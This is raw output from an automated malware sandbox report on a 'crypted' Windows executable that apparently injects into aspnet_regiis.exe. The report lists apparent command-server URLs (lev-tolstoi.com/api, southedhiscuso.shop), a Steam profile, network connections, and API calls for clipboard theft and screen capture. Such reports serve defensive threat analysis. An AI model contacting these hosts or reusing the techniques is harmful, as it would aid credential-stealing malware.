Source: aspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2310585702.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/
Source: aspnet_regiis.exe, 00000002.00000002.2310585702.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/-
Source: aspnet_regiis.exe, 00000002.00000002.2310585702.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/9
Source: aspnet_regiis.exe, 00000002.00000003.2021686347.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002C09000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2013739073.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/;~
Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/P
Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2310023537.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api
Source: aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api(
Source: aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2049691966.0000000002BBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apiH
Source: aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apial
Source: aspnet_regiis.exe, 00000002.00000002.2310023537.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apidows6$
Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/h
Source: aspnet_regiis.exe, 00000002.00000002.2310585702.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/pi
Source: aspnet_regiis.exe, 00000002.00000003.2021686347.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1965527761.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1964908973.0000000002C08000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1965112088.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002C09000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2013739073.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/sj
Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/yo
Source: aspnet_regiis.exe, 00000002.00000003.2049691966.0000000002BBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com:443/api
Source: aspnet_regiis.exe, 00000002.00000002.2310023537.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2049691966.0000000002BBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com:443/apiapi
Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://southedhiscuso.shop:443/api
Source: aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900d
Source: aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: aspnet_regiis.exe, 00000002.00000003.1866541610.000000000503E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: aspnet_regiis.exe, 00000002.00000003.1967836712.000000000510B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: aspnet_regiis.exe, 00000002.00000003.1967836712.000000000510B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: aspnet_regiis.exe, 00000002.00000003.1866541610.000000000503C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866624782.0000000005035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: aspnet_regiis.exe, 00000002.00000003.1866624782.0000000005010000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: aspnet_regiis.exe, 00000002.00000003.1866541610.000000000503C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866624782.0000000005035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: aspnet_regiis.exe, 00000002.00000003.1866624782.0000000005010000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: aspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: aspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: aspnet_regiis.exe, 00000002.00000003.1967836712.000000000510B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: aspnet_regiis.exe, 00000002.00000003.1967836712.000000000510B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: aspnet_regiis.exe, 00000002.00000003.1967836712.000000000510B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: aspnet_regiis.exe, 00000002.00000003.1967836712.000000000510B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: aspnet_regiis.exe, 00000002.00000003.1967836712.000000000510B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49744 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_00429BC0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_00429BC0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_00429BC0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_00429BC0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_0042A39F GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

2_2_0042A39F

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe

Code function: 0_2_6CDC8810 GetModuleHandleW,NtQueryInformationProcess,GetModuleHandleW,

0_2_6CDC8810

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Code function: 0_2_6CDC8810	0_2_6CDC8810
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Code function: 0_2_6CDC11C0	0_2_6CDC11C0
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Code function: 0_2_6CDE2865	0_2_6CDE2865
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Code function: 0_2_6CDD6990	0_2_6CDD6990
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Code function: 0_2_6CDC7D50	0_2_6CDC7D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0041F090	2_2_0041F090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0040A0A0	2_2_0040A0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_004140A0	2_2_004140A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00436120	2_2_00436120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0040F27F	2_2_0040F27F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0042EA20	2_2_0042EA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0040CB45	2_2_0040CB45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0041E3D9	2_2_0041E3D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0041538C	2_2_0041538C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0040BB91	2_2_0040BB91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00436B90	2_2_00436B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00415C49	2_2_00415C49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0041EC00	2_2_0041EC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0040F403	2_2_0040F403
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0041C490	2_2_0041C490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0043354F	2_2_0043354F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00420D50	2_2_00420D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00404E60	2_2_00404E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00416EC0	2_2_00416EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0042E6E0	2_2_0042E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0040BE90	2_2_0040BE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00422EB0	2_2_00422EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0042DF70	2_2_0042DF70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0040A700	2_2_0040A700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0040AF00	2_2_0040AF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0041B7D0	2_2_0041B7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_004157D0	2_2_004157D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0041F7D0	2_2_0041F7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00432FE0	2_2_00432FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0040CFA0	2_2_0040CFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0040F80B	2_2_0040F80B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0041B037	2_2_0041B037
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00405880	2_2_00405880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_004010B8	2_2_004010B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0041F178	2_2_0041F178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00411199	2_2_00411199
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_004019A2	2_2_004019A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00403A40	2_2_00403A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00408250	2_2_00408250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0042034B	2_2_0042034B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00411B5D	2_2_00411B5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0042DB00	2_2_0042DB00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00434B20	2_2_00434B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0040EBC0	2_2_0040EBC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00406BD0	2_2_00406BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00409BE0	2_2_00409BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00422B90	2_2_00422B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00410B95	2_2_00410B95
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00436470	2_2_00436470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00434C30	2_2_00434C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_004044A0	2_2_004044A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_004065D0	2_2_004065D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00432580	2_2_00432580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0042CD86	2_2_0042CD86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00433DAF	2_2_00433DAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00434661	2_2_00434661
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0040CE30	2_2_0040CE30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00411B5D	2_2_00411B5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0041D6A1	2_2_0041D6A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00408F50	2_2_00408F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00434770	2_2_00434770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0041FF23	2_2_0041FF23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00434FE0	2_2_00434FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_00406F84	2_2_00406F84
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_004367A0	2_2_004367A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 004096B0 appears 104 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 00408D40 appears 40 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7408 -s 1648

Source: Armanivenntii_crypted_EASY.exe, 00000000.00000002.1693007252.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Armanivenntii_crypted_EASY.exe
Source: Armanivenntii_crypted_EASY.exe, 00000000.00000000.1688480461.0000000000952000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWendy251Michael.pdfP vs Armanivenntii_crypted_EASY.exe
